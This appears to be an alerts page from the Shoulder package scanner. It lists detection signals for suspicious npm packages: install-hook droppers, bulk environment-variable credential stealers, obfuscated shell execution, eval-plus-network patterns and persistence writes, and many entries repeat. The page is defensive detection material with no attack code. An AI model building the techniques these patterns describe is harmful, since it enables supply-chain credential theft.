Payload delivery from suspicious source: IOC URL + execution capability
Alertas de Seguridad
Señales del análisis del ecosistema de Shoulder — nuevos paquetes escaneados, cambios de riesgo detectados y vulnerabilidades identificadas.
Las alertas se generan cuando Shoulder analiza un paquete y detecta señales que vale la pena revisar. Cada alerta enlaza a un informe completo de amenaza.
Payload delivery from suspicious source: IOC URL + execution capability
Install-time exfil signature: install hook + credential/env access + outbound network + obfuscated payload
- NEW obfuscation in this version + shell exec + network — encrypted-payload update shape (spawn/exec path)
- Obfuscated shell execution — concealment pattern
Payload delivery from suspicious source: IOC URL + execution capability
- Bulk env-var sweep + shell exec at runtime — credential-stealer
- Bulk env-var sweep (cap-bulk-env-access reads ALL of process.env) + outbound network — credential-stealer
- Install hook spawns dynamic / forked-detached shell — dropper attribution
- Install hook sends traffic to flagged target (raw IP / paste site / tunnel) — dropper
- Install hook writes to system paths (/etc/, /usr/, etc.) — review for persistence
- Install hook + shell exec + network — dropper shape (scopes may be install or runtime; install hook can transitively reach runtime caps via the postinstall entrypoint)
Manifest version doesn't match any embedded version constant in the bundle — bundle may not have been rebuilt from the published manifest; review release pipeline and corroborating signals
- Sensitive file access with network egress — credential exfiltration pattern
npm main entrypoint contains side-effecting code AFTER its last module.exports / export default — runs silently on require() and reaches a dangerous capability (install-hook bypass)
Dynamic eval + network + shell exec — dropper trio (arbitrary code execution, exfiltration channel, OS access)
- Dynamic code evaluation with network access — potential code injection or exfiltration
Dynamic eval + network + shell exec — dropper trio (arbitrary code execution, exfiltration channel, OS access)
- Dynamic code evaluation with network access — potential code injection or exfiltration
Install hook writes to system paths (/etc/, /usr/, etc.) — review for persistence
Suspicious install-time execution: 2+ suspicious signals during install
- A dist-tag (e.g. latest) was moved to this version while it was less than 1 hour old — publish-side compromise indicator
Behavioral change: new process control without corroborating signals
Dynamic eval + network + shell exec — dropper trio (arbitrary code execution, exfiltration channel, OS access)
- Install hook + shell exec + network — dropper shape (scopes may be install or runtime; install hook can transitively reach runtime caps via the postinstall entrypoint)
- Dynamic code evaluation with network access — potential code injection or exfiltration
Install hook writes to system paths (/etc/, /usr/, etc.) — review for persistence
- Install hook + shell exec + network — dropper shape (scopes may be install or runtime; install hook can transitively reach runtime caps via the postinstall entrypoint)
Payload delivery from suspicious source: IOC URL + execution capability
- Dynamic / forked-detached shell paired with code obfuscation — runtime dropper attribution (no install hook required)
- Bulk env-var sweep + shell exec at runtime — credential-stealer
- Bulk env-var sweep (cap-bulk-env-access reads ALL of process.env) + outbound network — credential-stealer
- Dynamic eval + network + shell exec — dropper trio (arbitrary code execution, exfiltration channel, OS access)
- Obfuscated shell execution — concealment pattern
- Dynamic code evaluation with network access — potential code injection or exfiltration
Behavioral change: new process control without corroborating signals